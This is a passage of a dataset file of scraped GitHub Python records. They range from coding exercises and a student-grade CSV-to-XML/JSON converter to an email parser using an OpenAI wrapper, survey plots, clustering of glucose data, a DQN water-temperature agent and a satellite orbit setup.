}\n","repo_name":"TrashRoach/discord-bot","sub_path":"src/models/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29926121477","text":"\ndef is_special_array(lst):\n for x in range(len(lst)):\n if x%2 == 0 and lst[x]%2 == 0:\n continue\n elif x%2 != 0 and lst[x]%2 != 0:\n continue\n else:\n return False\n return True\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"BmZ6PGMJiLWMzgvos_19.py","file_name":"BmZ6PGMJiLWMzgvos_19.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"47162923342","text":"import fonctions\r\nimport json\r\nimport xml.etree.ElementTree as ET\r\n#Le travail est divise en deux parties :traiment de donnees et traitement de fichiers\r\n#Traitement fichier a partir du ligne 132\r\n\r\nwith open('/home/khalil/Bureau/python/Projet Python Fichiers/Donnees_Projet_Python_DataC5.csv' , 'r' ,encoding=\"UTF-8\") as f: \r\n eleves=f.read().split(\"\\n\")\r\n del eleves[0]\r\nTab_eleve=[]\r\nfor eleve in eleves :\r\n \r\n e=eleve.split(\",\")\r\n try:\r\n dic_eleves={\r\n \"Code\":e[0],\r\n \"Numero\" :e[1],\r\n \"Nom\":e[2],\r\n \"Prenom\":e[3],\r\n \"Date_nais\":e[4],\r\n \"Classe\":e[5],\r\n \"Note\":e[6]\r\n\r\n }\r\n Tab_eleve.append(dic_eleves)\r\n except IndexError:\r\n \"\" \r\n \r\n#suppression des lignes vides\r\nt=[]\r\nfor eleves in Tab_eleve :\r\n if not eleves['Nom']=='' :\r\n t.append(eleves) \r\n\r\n#Changer format date \r\n#del t[152]['Date_nais'] \r\nfor i in range(len(t)) :\r\n t[i][\"Date_nais\"]=t[i][\"Date_nais\"].lstrip()\r\n for char in t[i][\"Date_nais\"] :\r\n if char in ['-',',',':','_','|','.',' '] :\r\n t[i]['Date_nais']=t[i]['Date_nais'].replace(char,\"/\")\r\n \r\n #print(t[i][\"Date_nais\"])\r\n#Changer format Classe\r\nfor i in range(len(t)): \r\n t[i][\"Classe\"]=t[i][\"Classe\"].replace(' ','')\r\n t[i][\"Classe\"]=t[i][\"Classe\"][0]+ \"em\" +t[i][\"Classe\"][-1].capitalize() \r\n \r\n\r\n#Recuperation des notes dans un dictionnnaire \r\nfor i in range(len(t)) :\r\n m=t[i][\"Note\"].split(\"#\")\r\n del t[i][\"Note\"]\r\n dic_matieres={}\r\n t[i][\"matieres\"]={}\r\n for j in m :\r\n j=j.replace(\"[\",\"-\").replace(\"|\",\"-\").replace(\":\",\"-\").replace(\"]\",\"-\").split(\"-\")\r\n try:\r\n dic_matieres[j[0]]={\r\n \"Devoir\":j[1:-2],\r\n \"Examen\":j[-2]\r\n }\r\n #print(dic_matieres) \r\n t[i][\"matieres\"].update(dic_matieres)\r\n #print(t[i]) \r\n #T.append(dic_matieres)\r\n \r\n except IndexError:\r\n pass \r\n\r\ntableau_valide = []\r\ntableau_invalide = []\r\n\r\n#Boucle à travers chaque ligne d'élève\r\nfor eleve in t:\r\n numero = eleve['Numero']\r\n nom=eleve['Nom']\r\n prenom=eleve['Prenom']\r\n date_nais=eleve['Date_nais']\r\n classe=eleve['Classe']\r\n est_valide = True\r\n erreur={}\r\n\r\n # Vérifie si le code est valide\r\n if not fonctions.est_numero_valide(numero):\r\n #print(f\"Le code {code} est invalide car il ne commence pas par un chiffre\")\r\n erreur['numero']= f\"Le numero {numero} est invalide \"\r\n est_valide = False\r\n\r\n # Vérifie si le numéro est valide\r\n if not fonctions.est_prenom_valide(prenom):\r\n erreur['prenom']= f\"Le prenom {prenom} est invalide \"\r\n est_valide = False\r\n if not fonctions.est_nom_valide(nom):\r\n erreur['nom']= f\"Le nom {nom} est invalide \"\r\n est_valide = False \r\n if not fonctions.est_date_valide(date_nais):\r\n erreur['date_nais']= f\"La date {date_nais} est invalide \"\r\n est_valide = False \r\n if not fonctions.est_classe_valide(classe):\r\n erreur['classe']= f\"La classe {classe} est invalide \"\r\n est_valide = False \r\n for mat in eleve['matieres'] :\r\n devoir=eleve['matieres'][str(mat)]['Devoir']\r\n examen=eleve['matieres'][str(mat)]['Examen']\r\n if not fonctions.notes_devoir_valides(devoir) :\r\n erreur['devoir']= f\"La note de devoir {devoir} est invalide \"\r\n est_valide = False \r\n if not fonctions.note_examen_valide(examen) :\r\n erreur['examen']= f\"La note d'examen {examen} est invalide \"\r\n est_valide = False \r\n\r\n eleve[\"erreur\"]=erreur\r\n # Ajoute la ligne d'élève au tableau valide ou invalide\r\n if est_valide:\r\n tableau_valide.append(eleve)\r\n else:\r\n tableau_invalide.append(eleve)\r\n\r\n#Calcul de la moyenne par matiere \r\nfor eleve in tableau_valide :\r\n for matiere, notes in eleve['matieres'].items():\r\n moyenne_matiere = (sum(int(note) for note in notes['Devoir'])/len(notes['Devoir']) + 2*int(notes['Examen']))/3\r\n moyenne_matiere=round(moyenne_matiere,2)\r\n eleve['matieres'][matiere]['Moyenne_matieres'] = moyenne_matiere\r\n# Calcul de la moyenne générale\r\n moyenne_generale = sum([matiere['Moyenne_matieres'] for matiere in eleve['matieres'].values()])/len(eleve['matieres'])\r\n moyenne_generale=round(moyenne_generale,2)\r\n# Ajout de la moyenne générale dans le dictionnaire\r\n eleve['Moyenne_generale'] = moyenne_generale\r\n\r\n#################################################################################\r\n# TRAITEMENT DES FICHIERS\r\n\r\n#print(tableau_valide)\r\n# Demande à l'utilisateur de choisir le format pour les données valides\r\nprint(\"Dans quel format voulez-vous enregistrer les données valides ?\")\r\nprint(\"1. XML\")\r\nprint(\"2. JSON\")\r\nchoix = input(\"Votre choix (1 ou 2) : \")\r\n\r\n# Traitement des données valides selon le choix de l'utilisateur\r\nif choix == \"1\":\r\n # Enregistrement des données valides en XML\r\n racine = ET.Element(\"eleves\")\r\n for eleve in tableau_valide:\r\n #La SubElement()fonction permet de créer de nouveaux sous-éléments pour un élément donné \r\n elt_eleve = ET.SubElement(racine, \"eleve\")\r\n for cle, valeur in eleve.items():\r\n #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n elt_attribut = ET.SubElement(elt_eleve, cle)\r\n elt_attribut.text = str(valeur)\r\n arbre = ET.ElementTree(racine)\r\n arbre.write(\"valides.xml\", encoding=\"UTF-8\")\r\n print(\"Les données valides ont été enregistrées dans le fichier valides.xml\")\r\nelse:\r\n # Enregistrement des données valides en JSON\r\n with open(\"valides.json\", \"w\", encoding=\"UTF-8\") as f:\r\n json.dump(tableau_valide, f, indent=4)\r\n print(\"Les données valides ont été enregistrées dans le fichier valides.json\")\r\n\r\n# Demande à l'utilisateur de choisir le format pour les données invalides\r\nprint(\"Dans quel format voulez-vous enregistrer les données invalides ?\")\r\nprint(\"1. XML\")\r\nprint(\"2. JSON\")\r\nchoix = input(\"Votre choix (1 ou 2) : \")\r\n\r\n# Traitement des données invalides selon le choix de l'utilisateur\r\nif choix == \"1\":\r\n # Enregistrement des données invalides en XML\r\n racine = ET.Element(\"eleves\")\r\n for eleve in tableau_invalide:\r\n elt_eleve = ET.SubElement(racine, \"eleve\")\r\n for cle, valeur in eleve.items():\r\n elt_attribut = ET.SubElement(elt_eleve, cle)\r\n elt_attribut.text = str(valeur)\r\n arbre = ET.ElementTree(racine)\r\n arbre.write(\"invalides.xml\", encoding=\"UTF-8\")\r\n print(\"Les données invalides ont été enregistrées dans le fichier invalides.xml\")\r\nelse:\r\n # Enregistrement des données invalides en JSON\r\n with open(\"invalides.json\", \"w\", encoding=\"UTF-8\") as f:\r\n json.dump(tableau_invalide, f, indent=4)\r\n print(\"Les données invalides ont été enregistrées dans le fichier invalides.json\")\r\n \r\n","repo_name":"khalil6c/Dev_DATA_P5_Ibrahima_Khalil_CISSE","sub_path":"P5_Python_MIC003_Fichiers/main_fichiers.py","file_name":"main_fichiers.py","file_ext":"py","file_size_in_byte":7479,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41107848917","text":"import json\nimport re\n\nfrom config import OPENAI_API_KEY\nfrom constants import PARSE_SYS_TEMPLATE, PARSE_USER_TEMPLATE, SYS_SANS_CONFIDENCE, COMBINED_TEMPLATE\nfrom openai_wrappers import OpenAIWrapper\nfrom parse_utils import (\n ParseField,\n format_field_list,\n # remove_punctuation\n)\n\nopenai_wrapper = OpenAIWrapper(OPENAI_API_KEY)\n\nIS_FF_EVENT_FIELD = ParseField(\"is_free_food_event\", \"Whether the email describes an event with free food\", \"boolean\")\nIS_EVENT_FIELD = ParseField(\"is_event\", \"Is this email is an event invitation\", \"boolean\")\nNAME_FIELD = ParseField(\"name\", \"The name of the event\", \"string\")\nSTART_FIELD = ParseField(\"start\", \"The start date and time of the event\", \"Date\")\nEND_FIELD = ParseField(\"end\", \"The end date and time of the event\", \"Date\")\nLOCATION_FIELD = ParseField(\"location\", \"The location of the event\", \"string\")\nFOOD_TYPE_FIELD = ParseField(\"food_type\", \"The type of food at the event\", \"string\")\nFF_FIELD_LIST = [IS_FF_EVENT_FIELD, NAME_FIELD, START_FIELD, END_FIELD, LOCATION_FIELD, FOOD_TYPE_FIELD]\nIC_FIELD_LIST = [IS_EVENT_FIELD, NAME_FIELD, START_FIELD, END_FIELD, LOCATION_FIELD]\n\ndef remove_links(text):\n \"\"\"\n - Define a regular expression pattern to match links\n - Use the re.sub() function to replace all matches of the link pattern with an empty string\n\n \"\"\"\n link_pattern = r''\n return re.sub(link_pattern, '', text)\n\ndef remove_email_addresses(text):\n email_address_pattern = r'<\\S+@\\S+>'\n return re.sub(email_address_pattern, '', text)\n\ndef truncate_email(email, max_words):\n return ' '.join(email.split()[:max_words])\n\ndef extract_fields(txt, fields=FF_FIELD_LIST, max_tokens=300):\n # prepare prompt\n string_fields = format_field_list(fields)\n # chat_history = [\n # { \n # \"role\": \"system\", \n # # \"content\": PARSE_SYS_TEMPLATE.format(string_fields=string_fields)\n # \"content\": SYS_SANS_CONFIDENCE.format(string_fields=string_fields)\n # },\n # {\n # \"role\": \"user\",\n # \"content\": PARSE_USER_TEMPLATE.format(document=txt)\n # }\n # ]\n chat_history = [{\"role\": \"user\", \"content\": COMBINED_TEMPLATE.format(document=txt, string_fields=string_fields)}]\n \n # extract info\n completion = openai_wrapper.chat_gpt_completion(chat_history, max_tokens=max_tokens)\n\n # try to parse the expected JSON format\n try:\n if isinstance(completion, str):\n completion = json.loads(completion)\n else:\n completion = json.loads(completion[0])\n except json.JSONDecodeError as e:\n print(completion)\n raise e\n\n # handle non-str \n # is_ff_event = remove_punctuation(completion[\"is_free_food_event\"]).lower() == \"true\"\n # completion[\"is_free_food_event\"] = is_ff_event\n\n return completion\n\ndef summarize_email(txt, max_tokens=300):\n chat_history = [\n {\n \"role\": \"user\",\n \"content\": f\"Email:\\n{txt}\\n---\\nPlease write a 2 sentence summary of this email.\"\n }\n ]\n summary = openai_wrapper.chat_gpt_completion(chat_history, max_tokens=max_tokens)\n return summary\n","repo_name":"matt-seb-ho/free_food_owo","sub_path":"src/parse_email.py","file_name":"parse_email.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70200352411","text":"# %%\nimport os\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nos.chdir('/Users/au582299/Desktop/dm/decision-making-tweak/politicians_sweden')\n\ndf = pd.read_csv('dat/data_recoded.csv')\nfig_outdir = 'fig/exploratory'\n\n###\n### Satisfied polls \n###\n# %%\nf = sns.barplot(\n x=df['sex'],\n y=df['Satisfied_polls'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'sex_satisfied.png'))\n\n\n# %%\nf = sns.barplot(\n x=df['edu'],\n y=df['Satisfied_polls'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'edu_satisfied.png'))\n\n\n# %%\nplt.figure(figsize=(15, 8))\nf = sns.barplot(\n x=df['party_combined'],\n y=df['Satisfied_polls'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'party_satisfied.png'))\n\n\n# %%\n###\n### Change overall\n###\nf = sns.barplot(\n x=df['sex'],\n y=df['Change_policy_overall'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'sex_change.png'))\n\n\n# %%\nf = sns.barplot(\n x=df['edu'],\n y=df['Change_policy_overall'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'edu_change.png'))\n\n\n# %%\nplt.figure(figsize=(15, 8))\nf = sns.barplot(\n x=df['party_combined'],\n y=df['Change_policy_overall'],\n hue=df['Treatment_polls']\n)\n\nf.get_figure().savefig(os.path.join(fig_outdir, 'party_change.png'))\n\n\n# %%\n# party close\nsns.distplot(\n x=df['party_close_rec']\n)\n\n# %%\nsns.barplot(\n x=df['party_close_h14'].astype('str')\n)\n# %%\ndf['party_close_str'] = df['party_close_h14'].astype(str)\ndf.groupby('party_close_str')['party_close_str'].value_counts()\n\n# %%\nplt.figure(figsize=(15, 8))\nf = sns.violinplot(\n x=df['party_close_str'],\n y=df['Satisfied_polls'],\n hue=df['Treatment_polls'],\n order=[\"1.0\", \"2.0\", \"3.0\", \"4.0\", \"nan\"]\n)\n\n# %%\n","repo_name":"jankounchained/swedish-politicians-abm","sub_path":"src/study_data/barplots.py","file_name":"barplots.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30129840557","text":"\"\"\"\r\n\n\nCreate a function that takes an integer list and return the biggest between\n**positive** sum, **negative** sum, or **0s** count. The major is understood\nas the greatest absolute.\n\n`l = [1,2,3,4,0,0,-3,-2]`, the function has to return `10`, because:\n\n * Positive sum = 1+2+3+4 = 10\n * Negative sum = (-3)+(-2) = -5\n * 0s count = 2 (there are two zeros in list)\n\n### Examples\n\n major_sum([1, 2, 3, 4, 0, 0, -3, -2]) ➞ 10\n \n major_sum([-4, -8, -12, -3, 4, 7, 1, 3, 0, 0, 0, 0]) ➞ -27\n \n major_sum([0, 0, 0, 0, 0, 1, 2, -3]) ➞ 5\n # Because -3 < 1+2 < 0sCount = 5\n\n### Notes\n\n * All numbers are integers.\n * There aren't empty lists.\n * All tests are made to return only one value.\n\n\"\"\"\r\n\ndef major_sum(lst):\n pos = sum(i for i in lst if i>0)\n neg = sum(i for i in lst if i < 0)\n zeros = sum(1 for i in lst if i == 0)\n res = max(pos, abs(neg), zeros)\n return pos if res==pos else neg if res == abs(neg) else zeros\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kiX7WjSFeTmBYcEgK_16.py","file_name":"kiX7WjSFeTmBYcEgK_16.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23459087191","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 22 18:28:04 2020\r\n\r\n@author: avkgu\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport csv\r\nfrom datetime import datetime, timedelta\r\nimport numpy as np\r\nfrom sklearn import preprocessing\r\nfrom sklearn.decomposition import PCA\r\nimport scipy.stats\r\nimport pandas as pd # Import pandas for data manipulation/handling\r\nimport numpy as np # Import numpy for number processing\r\nfrom pandas.plotting import scatter_matrix # Used for plotting scatter matrix\r\nimport matplotlib # Need to import matplotlib\r\nimport matplotlib.pyplot as plt # Used to plot\r\nfrom sklearn import model_selection\r\nfrom scipy.integrate import simps\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import model_selection\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import KFold \r\nfrom sklearn.model_selection import cross_val_score\r\nimport pickle\r\nfrom sklearn.cluster import KMeans,DBSCAN\r\n\r\n###########################################\r\n#read csv file\r\n##########################################\r\ndf = pd.read_csv('CGMData.csv',\r\n usecols=['Date','Time','Sensor Glucose (mg/dL)'])\r\n\r\ndf1 = pd.read_csv('InsulinData.csv',\r\n usecols=['Date','Time','BWZ Carb Input (grams)'])\r\n\r\ndf['Date'] = pd.to_datetime(df['Date'])\r\n\r\ndf['Date'] = df['Date'].dt.strftime(\"%m/%d/%y\")\r\n\r\ndf['Time'] = pd.to_datetime(df['Time'])\r\n\r\ndf['Time'] = df['Time'].dt.strftime(\"%H:%M:%S\")\r\n\r\n###########################################\r\n#reformatting dataframe\r\n###########################################\r\n\r\ndf['Date_Time'] = df['Date']+' '+df['Time']\r\ndf['Date_Time']=pd.to_datetime(df['Date_Time'])\r\ndf = df.set_index('Date_Time')\r\ndf = df.sort_values(by='Date_Time')\r\ndfx=df.interpolate(method ='linear', limit_direction ='forward')\r\n\r\ndf1 = df1.dropna()\r\n\r\n\r\ndf1['Date_Time'] = df1['Date']+' '+df1['Time']\r\ndf1['Date_Time']=pd.to_datetime(df1['Date_Time'])\r\ndf1 = df1.sort_values(by='Date_Time')\r\n\r\nmt=df1[[\"Date_Time\"]]\r\n\r\n####################################################\r\n#mealtime data\r\n####################################################\r\nmtx=mt\r\nmtx=mtx.set_index('Date_Time')\r\nmtx['dt']=mtx.index\r\nmtx['delta'] = (mtx['dt']-mtx['dt'].shift())\r\ntexma=0\r\nte1=pd.to_datetime(texma)\r\nte2=pd.to_datetime(texma)\r\ndel1=te1-te2\r\nmtx['delta'].fillna(value=del1)\r\nmtf=mtx.loc[(mtx['delta']>='02:00:00')]\r\nmtf['time1']=mtf['dt'] - timedelta(minutes=30)\r\nmtf['time2']=mtf['dt'] + timedelta(hours=2)\r\nmtf['time3']=mtf['dt'] + timedelta(hours=4)\r\nmati=mtf['dt'].values.tolist()\r\nmati1=pd.to_datetime(mati)\r\ndf3=df1\r\ndf3=df3.set_index('Date_Time')\r\ndf3['dt']=mtx.index\r\ndf3['delta'] = (df3['dt']-df3['dt'].shift())\r\ndf3['delta'].fillna(value=del1)\r\ndf3=df3.loc[(df3['delta']>='02:00:00')]\r\ncarb=df3['BWZ Carb Input (grams)'].values.tolist()\r\nmd=[]\r\nmdld1=[]\r\nfor i in range(len(mtf)):\r\n la=dfx.loc[(dfx.index>mtf['time1'][i])&(dfx.index maxi):\r\n break\r\n\r\n\r\ndf5['binned'] = pd.cut(df5[df5.columns[30]], bins=bins,labels = lables)\r\nlabl1=df5['binned']\r\n#df1['binned'] = pd.cut(df1['BWZ Carb Input (grams)'], bins=bins,labels = lables)\r\n#labelmat=df1['binned']\r\nnob=len(lables)\r\n\r\n\r\n######################################################\r\n#feature1 \r\n######################################################\r\n\r\n\r\nmac=meld.max(axis=1)\r\nminim=meld.min(axis=1)\r\ncgmdiff=mac-minim\r\ncgmdiff1=np.array(cgmdiff)\r\ncdiff2=np.reshape(cgmdiff1, (len(cgmdiff), 1))\r\n\r\nsc = StandardScaler()\r\n\r\ncdiff2 = sc.fit_transform(cdiff2)\r\n\r\n\r\n#######################################################\r\n#feature2\r\n#######################################################\r\n\r\nglobal FFT_Feature_Matrix\r\nFFT_coefficents = []\r\nfor it in range(meld.shape[0]):\r\n FFT_coefficents.append(np.abs(np.fft.fft((meld.iloc[it,::-1])))[1:9])\r\nFFT_Feature_Matrix = pd.DataFrame(list(map(np.ravel, FFT_coefficents)))\r\n\r\nFFT_Feature_Matrix = sc.fit_transform(FFT_Feature_Matrix)\r\n\r\n#for it in range(meld.shape[0]):\r\n# \r\n# FFT_coefficents.append(np.abs(np.fft.fft((meld.iloc[it,::-1]))))\r\n# FFT_Feature_Matrix = []\r\n# \r\n#for c in range(0,len(FFT_coefficents)):\r\n# FFT_Feature_Matrix.append(FFT_coefficents[c][1:9]) # Take top 8\r\n#print(len(FFT_Feature_Matrix))\r\n\r\n#########################################################\r\n#f3\r\n#########################################################\r\n\r\nGroup_mean1 = []\r\nGroup_mean2 = []\r\nGroup_mean3 = []\r\nGroup_mean4 = []\r\nGroup_mean5 = []\r\nfor i in range(meld.shape[0]):\r\n Group_mean1.append(meld.iloc[i,0:5].mean())\r\n Group_mean2.append(meld.iloc[i,6:11].mean())\r\n Group_mean3.append(meld.iloc[i,12:17].mean())\r\n Group_mean4.append(meld.iloc[i,18:23].mean())\r\n Group_mean5.append(meld.iloc[i,23:29].mean())\r\n \r\nGroup_mean = sc.fit_transform(pd.DataFrame([Group_mean1,Group_mean2,Group_mean3,Group_mean4,Group_mean5]))\r\n\r\n#f4\r\npolycoeff = []\r\nfor i in range(meld.shape[0]):\r\n polycoeff.append(np.polyfit(np.linspace(0,30,30), meld.iloc[i,:], 5))\r\n\r\npoly_coeff = sc.fit_transform(pd.DataFrame(polycoeff).transpose())\r\n \r\n#Feture_Matrix = np.stack((\r\n# np.array(Group_mean1),\r\n# np.array(Group_mean2),\r\n# np.array(Group_mean3),\r\n# np.array(Group_mean4),\r\n# np.array(Group_mean5),\r\n# ))\r\n#fm1=np.hstack((np.transpose(Feture_Matrix),\r\n# np.array(cdiff2),\r\n# np.array(FFT_Feature_Matrix),\r\n# np.array(polycoeff)))\r\nFeture_Matrix = pd.concat([\r\n pd.DataFrame(Group_mean).transpose(),\r\n pd.DataFrame(cdiff2),\r\n pd.DataFrame(FFT_Feature_Matrix),\r\n pd.DataFrame(poly_coeff).transpose()],axis=1,ignore_index=True\r\n )\r\nFeture_Matrix = Feture_Matrix.to_numpy()\r\npca = PCA(n_components=9)\r\nFeture_Matrix = pca.fit_transform(Feture_Matrix)\r\n\r\n################################################\r\n#kmeans\r\n################################################\r\n\r\nkm = KMeans(n_clusters=nob,init='k-means++',n_init=10,max_iter=300,tol=1e-4,random_state=5)\r\ny_km = km.fit_predict(Feture_Matrix)\r\nkm1=km.fit(Feture_Matrix)\r\nsse=km1.inertia_\r\n\r\n\r\n################################################\r\n#dbscan\r\n################################################\r\ndbsc = DBSCAN(eps=1.5,min_samples=2)\r\ndbsc1 = dbsc.fit_predict(Feture_Matrix)\r\n\r\n\r\n################################################\r\n#entropy and purity\r\n################################################\r\ndef confmat(n,l1,l2):\r\n mat=[[0]*n for _ in range (n)]\r\n for i in range (n):\r\n for j in range(n):\r\n mat[i][j]=sum((l1==j)&(l2==i))\r\n return np.array(mat)\r\n\r\n\r\nc1= confmat(nob,labl1,km1)\r\n#c2=confmat(nob,labl1,y_km)\r\nfields=['SSE']\r\nsse1=[]\r\nsse1.append(sse)\r\nfilename = \"results.csv\"\r\n \r\n# writing to csv file \r\nwith open(filename, 'w') as csvfile: \r\n # creating a csv writer object \r\n csvwriter = csv.writer(csvfile) \r\n \r\n # writing the fields \r\n csvwriter.writerow(fields) \r\n \r\n # writing the data rows \r\n csvwriter.writerow(sse1) ","repo_name":"avkumar27/data-mining","sub_path":"project3.py","file_name":"project3.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41290034642","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport water\n\nBATCH_SIZE=40\nLR=0.01\nEPSILON=0.9\nGAMMA=0.9\nTARGET_RELACE_ITER=100\nMEMORY_CAPACITY=1000\nN_ACTIONS=3#加、减冷水 and 加、减热水\nN_STATES=4#冷水流量、温度 or 热水流量、温度) and 容器内水温、水量\nclass net(nn.Module):\n \"\"\"docstring for net\"\"\"\n def __init__(self, ):\n super(net, self).__init__()\n self.fc1=nn.Linear(N_STATES,10)\n self.fc1.weight.data.normal_(0,0.1)\n self.out=nn.Linear(10,N_ACTIONS)\n self.out.weight.data.normal_(0,0.1)\n def forward(self,x):\n x=self.fc1(x)\n x=F.relu(x)\n actions_value=self.out(x)\n return actions_value\nclass DQN(object):\n \"\"\"docstring for DQN\"\"\"\n def __init__(self):\n super(DQN, self).__init__()\n self.eval_hot_net,self.eval_cold_net,self.target_hot_net,self.target_cold_net=\\\n net().cuda(),net().cuda(),net().cuda(),net().cuda()\n\n self.learn_step_counter=0#\n self.memory_counter=0#学习进度\n self.memory=np.zeros((MEMORY_CAPACITY,15))#记忆库\n self.optimizer_hot=torch.optim.Adam(self.eval_hot_net.parameters(),lr=LR)\n self.optimizer_cold = torch.optim.Adam(self.eval_cold_net.parameters(), lr=LR)\n self.loss_func=nn.MSELoss()\n def choose_action(self,x_hot,x_cold):\n x_hot=Variable(torch.unsqueeze(torch.FloatTensor(x_hot),0))\n x_cold = Variable(torch.unsqueeze(torch.FloatTensor(x_cold), 0))\n if np.random.uniform() MEMORY_CAPACITY:\n Dqn.learn() # 记忆库满了就进行学习\n k += 1\n K=np.append(K,[[s[-4],s[-3],r,s_hot[1],s_cold[1]]],axis=0)\n if done: # 如果回合结束, 进入下回合\n #R=np.mean(np.sqrt((K[-40:, 0]-42)**2))\n R=-len([i for i in K[0:, 0] if 43 >=i>= 41])#以在41-43度区间内点数量最多的为最优结果\n #R = np.mean(K[-20:, 2])\n R_=np.append(R_,R)\n if R1>R:# 当前训练时间大于删一个训练时间,将长的保留下来\n K1,k1,R1,I=K,k,R,i\n break\n s_hot,s_cold = s_[[0,1,4,5]],s_[[2,3,4,5]]\n L=s[-3]\nT_max = np.max(K1[0:, 0]).astype(int)\nplt.figure()#最优训练结果温度变化曲线\nplot1_0=plt.plot(K1[0:,1],K1[0:,0])#温度水量变化曲线\nplot1_1 = plt.plot([0,K1[-1,1]],[42,42])#42度水温标准线\n\nlow=np.array([np.append(i,s) for s,i in enumerate(K1[0:,[0,1]]) if 41>i[0]>=0])\nplot1_2=plt.plot(low[:,1],low[:,0],'.b',[low[0,1],low[0,1]],[0,T_max],'b',[low[-1,1],low[-1,1]],[0,T_max],'b')#温度水量变化曲线,低温\n\nok=np.array([np.append(i,s) for s,i in enumerate(K1[0:,[0,1]]) if 43>=i[0]>=41])\nplot1_3=plt.plot(ok[:,1],ok[:,0],'.g',[ok[0,1],ok[0,1]],[0,T_max],'g',[ok[-1,1],ok[-1,1]],[0,T_max],'g')#温度水量变化曲线,合适\n\nxList=np.hstack([low[[0,-1],1],ok[[0,-1],1]])\nyList=np.hstack([low[[0,-1],2],ok[[0,-1],2]])\n\nhigh=np.array([np.append(i,s) for s,i in enumerate(K1[0:,[0,1]]) if i[0]>43])\nif len(high)>0:\n plot1_4=plt.plot(high[:,1],high[:,0],'.r',[high[0,1],high[0,1]],[0,T_max],'r',[high[-1,1],high[-1,1]],[0,T_max],'r')#温度水量变化曲线,高温\n xList = np.hstack([xList, high[[0, -1], 1]])\n yList = np.hstack([yList, high[[0, -1], 2]])\n\nfor s,[x, y] in enumerate(zip(xList, yList)):\n y=y*10//60+y*10%60/100\n y2=20.3+s*2.5\n plot1_5=plt.text(x,y2, '%.2f'%y, ha='center', va='bottom', fontsize=10.5)\nplt.title('T_change')\nplt.figure()#最优训练结果温R值变化曲线\nplot3 = plt.plot(K1[0:,1],K1[0:,2])\nplt.title('R')\n\nplt.figure()#最优训练结果的冷热水流量变化曲线,红色:热水;蓝色:冷水\nplot5 = plt.plot(K1[0:,1],K1[0:,3],'r')\nplot6 = plt.plot(K1[0:,1],K1[0:,4],'b')\nplt.title('water_hot and water_cold')\n\nplt.figure()#训练次数内训练结果曲线\nplot4 = plt.plot(range(L1),R_)\nplt.title('R_change1-'+str(L1))\n\nprint('各温度的持续时间(分钟):\\n[0-41)°区间:',len(low)*10//60,'分',(len(low)*10%60),'秒',\n '\\n[41-43]:',len(ok)*10//60,'分',(len(ok)*10%60),'秒',\n '\\n(43,):',len(high)*10//60,'分',(len(high)*10%60),'秒',\n '\\n最高温度:',T_max,\n '\\n水量:',K1[-1,1],\n '\\n总时长:',K1.shape[0]*10//60,'分',K1.shape[0]*10%60,'秒',\n '\\n第',I,'次时达到')\nplt.show()\n\n","repo_name":"Fantomeworking/DQN-Water-temperature-regulation","sub_path":"dqn2.py","file_name":"dqn2.py","file_ext":"py","file_size_in_byte":7801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16102305720","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 26 10:55:14 2022\n\n@author: T2F-7\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport euler_angle\nimport terra\nimport orientacao_quat\nimport periodo_orbital\nimport propagador_orbital_mk3\nimport sup_terra\n\nm = float(3) # massa do cubesat\na = float(0.1) # comprimento do sat\nb = float(0.1) # largura do sat\nc = float(0.2) # altura do sat\n\nIa = (m / 12) * (b ** 2 + c ** 2) # momento de inercia na direcao x\nIb = (m / 12) * (a ** 2 + c ** 2) # momento de inercia na direcao y\nIc = (m / 12) * (a ** 2 + b ** 2) # momento de inercia na direcao z\n\nrp = 7000 # semi eixo maior\necc = float(0.0) # ecentricidade da orbita\nRaan = float(0.0) # ascencao direita do nodo ascendente\narg_per = (float(0.0)) # argumento do perigeu\ntrue_anomaly = (float(110.0)) # anomalia verdadeira\ninc = (float(51.6)) # inclinacao\nmu = 398600 # constante gravitacional da terra\nJ2 = 1.08263e-3 # zona harmonica 2\nRaio_terra = float(6371) # raio da terra\nnum_orbita = 1 # numero de obitas\nIs = 1367.0\nIr = 267.0\ne = 1.0\nai = 1.0\nT_orbita = periodo_orbital.periodo_orbital(rp)\npasso = 10000\ngama = 0.3\n\nPSIP = 0.0\nTETAP = 0.0\nPHIP = (2 